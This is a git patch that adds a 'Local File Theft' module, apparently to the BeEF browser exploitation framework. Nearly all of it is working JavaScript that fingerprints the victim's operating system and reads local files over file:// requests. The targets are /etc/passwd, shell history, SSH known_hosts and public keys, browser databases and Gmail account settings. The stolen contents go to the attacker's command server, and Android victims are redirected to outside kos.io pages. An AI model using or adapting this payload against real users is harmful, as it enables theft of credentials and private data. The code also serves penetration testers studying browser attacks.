From ee1f4df1ea35010505d9964a23f7ccefc69e31a1 Mon Sep 17 00:00:00 2001 From: Mike Haworth Date: Fri, 20 Jan 2012 23:14:38 +1300 Subject: [PATCH] added local file theft module --- modules/misc/local_file_theft/command.js | 212 ++++++++++++++++++++++ modules/misc/local_file_theft/config.yaml | 14 ++ modules/misc/local_file_theft/module.rb | 13 ++ 3 files changed, 239 insertions(+) create mode 100644 modules/misc/local_file_theft/command.js create mode 100644 modules/misc/local_file_theft/config.yaml create mode 100644 modules/misc/local_file_theft/module.rb diff --git a/modules/misc/local_file_theft/command.js b/modules/misc/local_file_theft/command.js new file mode 100644 index 000000000..191179d7a --- /dev/null +++ b/modules/misc/local_file_theft/command.js @@ -0,0 +1,212 @@ +// local_file_theft +// +// Shamelessly plagurised from kos.io/xsspwn + +beef.execute(function() { + +result = ''; + + fileList = ['linux','mac','ios','android','windows'] + + + fileList['linux']= { + // How do we discover users? + "discover" :'/etc/passwd', + + // Okay, we found them, what do we pillage? + "post" :{ + 'bashHistory':'.bash_history', + 'sshHosts':'.ssh/known_hosts', + 'sshKeys':'.ssh/id_rsa.pub', + 'firefoxProfiles':'.mozilla/firefox/profiles.ini', + 'chromeBookmarks':'.config/chromium/Default/Bookmarks' + } + } + + fileList['mac']= { + // How do we discover users? + "discover" :'/Library/Preferences/com.apple.loginwindow.plist', + + // Okay, we found them, what do we pillage? + "post" :{ + 'bashHistory':'.bash_history', + 'sshHosts':'.ssh/known_hosts', + 'sshKeys':'.ssh/id_rsa.pub', + 'firefoxProfiles':'.mozilla/firefox/profiles.ini', + 'chromeBookmarks':'.config/chromium/Default/Bookmarks' + } + } + + fileList['android']= { + // Instead of how, just figure out the currently in use appi + "discover" :'/proc/self/status', + + // Okay, we found them, what do we pillage? + "post" :{ + 'browser_data':'/data/data/com.android.browser/databases/webview.db', + 'browser_data2':'/data/data/com.android.browser/databases/browser.db', + 'gmail_accounts':'/data/data/com.google.android.gm/shared_prefs/Gmail.xml', + 'dolpin_data':'/data/data/mobi.mgeek.TunnyBrowser/databases/webview.db', + 'dolpin_data2':'/data/data/mobi.mgeek.TunnyBrowser/databases/browser.db', + 'chromeBookmarks':'.config/chromium/Default/Bookmarks' + } + } + + fileList['ios']= { + // WHAT IS THIS I DON'T EVEN + "discover" :'', + + "post" :{ + 'iPadEtcHosts':'/etc/hosts' + } + } + + fileList['windows']= { + // Meh, who cares + "discover" :'', + + "post" :{ + 'bootini':'/c:/boot.ini', + 'hosts':'/c:/WINDOWS/system32/drivers/etc/hosts' + } + } + + functionList = { + mac:{ + // OS X disovery + discover : function(){ + tmp = new XMLHttpRequest() + tmp.open('get',"file:///"+fileList['mac']['discover']) + tmp.send() + tmp.onreadystatechange=function(){ + if(tmp.readyState==4){ + // TODO + // Understand plist format to _reliably_ pull out username with regex + //user = tmp.responseText.match(/\x03\x57(.*)\x12/)[1]; + user = tmp.responseText.match(/\x54(.*)\x12\x01/)[1]; + homedir = "/Users/"+user+"/"; + grabFiles(homedir,"mac") + } + } + return true; + } + }, + + linux:{ + // Linux username discovery + discover : function(){ + tmp = new XMLHttpRequest() + tmp.open('get',"file:///"+fileList['linux']['discover']) + tmp.send() + tmp.onreadystatechange=function(){ + if(tmp.readyState==4){ + userDir = tmp.responseText.match(/[a-z0-9]*:x:[0-9]{4}:[0-9]{4}:[^:]*:([^:]*)/)[1]; + homedir = userDir+"/"; + + grabFiles(homedir,"linux") + } + } + return true; + } + }, + + + ios:{ + // Grab ipad stuff + discover : function(){ + tmp = new XMLHttpRequest() + tmp.open('get',fileList['ios']['discover']) + tmp.send() + tmp.onreadystatechange=function(){ + if(tmp.readyState==4){ + homedir = "file:///"; + grabFiles(homedir,"ios") + } + } + + alert("ipad") + } + }, + + android:{ + // figure out what app (gmail, browser, or dolphin?) android + discover : function(){ + //document.location="http://kos.io/" + tmp = new XMLHttpRequest() + tmp.open('get',fileList['android']['discover']) + tmp.send() + tmp.onreadystatechange=function(){ + if(tmp.readyState==4){ + if(/.*android\.gm.*/.test(tmp.responseText)){ + document.location="http://kos.io/gmail" + } else if(/.*android\.browser.*/.test(tmp.responseText)){ + document.location="http://kos.io/browser" + } else if(/.*ek\.TunnyBrowser.*/.test(tmp.responseText)){ + document.location="http://kos.io/dolphin" + } + + grabFiles("/","android") + } + } + return true; + } + } + + + } + + + function identify(){ + if(/.*Android.*/.test(navigator.userAgent)){ + return "android" + } else if(/Linux.*/i.test(navigator.platform)){ + return "linux" + } else if(/iP.*/i.test(navigator.platform)){ + return "ios" + } else if(/.*Mac.*/i.test(navigator.userAgent)){ + return "mac" + } else if(/.*Windows.*/i.test(navigator.userAgent)){ + return "windows" + } else if(/.*hpwOS.*/i.test(navigator.platform)){ + return "webos" + } + } + + + function discoverUsers(os){ + return functionList[os]['discover']() + } + + + function grabFiles(dir,os){ + tmpfile = {} + for (i in fileList[os]['post']){ + console.log('dir = ' + dir); + console.log('fileList: ' + fileList[os]['post'][i]); + console.log(i); + tmpfile[i] = new XMLHttpRequest() + tmpfile[i].open ('get',dir+"/"+fileList[os]['post'][i]); + tmpfile[i].send(); + + tmpfile[i].onreadystatechange=function(){ + for (j in fileList[os]['post']){ + if(tmpfile[j].readyState==4){ + console.log('new returned for: ' + j); + result = j +": "+ tmpfile[j].responseText; + + beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result); + } + } + } + + + } + + } + + + discoverUsers(identify()); + + + +}); diff --git a/modules/misc/local_file_theft/config.yaml b/modules/misc/local_file_theft/config.yaml new file mode 100644 index 000000000..733714720 --- /dev/null +++ b/modules/misc/local_file_theft/config.yaml @@ -0,0 +1,14 @@ +# local_file_theft +# +# Shamelessly plagurised from kos.io/xsspwn + +beef: + module: + local_file_theft: + enable: true + category: "Misc" + name: "Local File Theft" + description: "Javascript may have filesystem access if we are running from a local resource and using the file:// scheme, this module checks common locations and cheekily snaches anything it finds. Shameless plagurised from kos.io/xsspwn. To test this module save the beefhook page locally and open in safari from the your localfile system" + authors: ["mh"] + target: + working: ["All"] diff --git a/modules/misc/local_file_theft/module.rb b/modules/misc/local_file_theft/module.rb new file mode 100644 index 000000000..63f372c04 --- /dev/null +++ b/modules/misc/local_file_theft/module.rb @@ -0,0 +1,13 @@ +# local_file_theft +# +# Shamelessly plagurised from kos.io/xsspwn + +class Local_file_theft < BeEF::Core::Command + + def post_execute + content = {} + content['result'] = @datastore['result'] + save content + end + +end